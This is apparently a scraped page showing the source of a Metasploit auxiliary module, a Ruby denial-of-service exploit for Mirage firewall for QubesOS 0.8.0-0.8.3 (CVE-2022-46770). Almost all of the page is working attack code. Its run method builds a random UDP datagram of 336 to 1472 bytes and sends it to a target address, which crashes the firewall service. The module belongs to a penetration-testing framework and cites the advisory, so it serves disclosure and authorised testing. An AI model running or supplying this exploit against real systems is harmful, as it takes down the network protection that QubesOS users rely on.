Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb
Views: 11655
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Udp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit',14'Description' => %q{15This module allows remote attackers to cause a denial of service (DoS)16in Mirage firewall for QubesOS 0.8.0-0.8.3 via a specifically crafted UDP request.17},18'Author' => 'Krzysztof Burghardt <[email protected]>',19'License' => MSF_LICENSE,20'References' => [21[ 'CVE', '2022-46770' ],22[ 'URL', 'https://mirage.io/blog/MSA03' ],23[ 'URL', 'https://github.com/mirage/qubes-mirage-firewall/issues/166' ],24],25'Notes' => {26'Stability' => [CRASH_SERVICE_DOWN],27'Reliability' => [],28'SideEffects' => [IOC_IN_LOGS]29},30'DisclosureDate' => '2022-12-04'31)32)3334register_options(35[36OptAddress.new('RHOST', [ false, 'Target address (Default: random)' ]),37OptPort.new('RPORT', [ false, 'Target port (Default: random)' ]),38]39)4041deregister_options('RHOSTS')42end4344def run45rhost = datastore['RHOST'] || [239, 255, Random.new.rand(255), Random.new.rand(255)].join('.')46rport = datastore['RPORT'] || Random.new.rand(65535)47connect_udp(true, 'RHOST' => rhost, 'RPORT' => rport)4849size = Random.new.rand(336...1472)50pkt = Random.new.bytes(size)51print_status("Sending random datagram of #{size} bytes to #{rhost}:#{rport}...")52udp_sock.put(pkt)5354disconnect_udp55end56end575859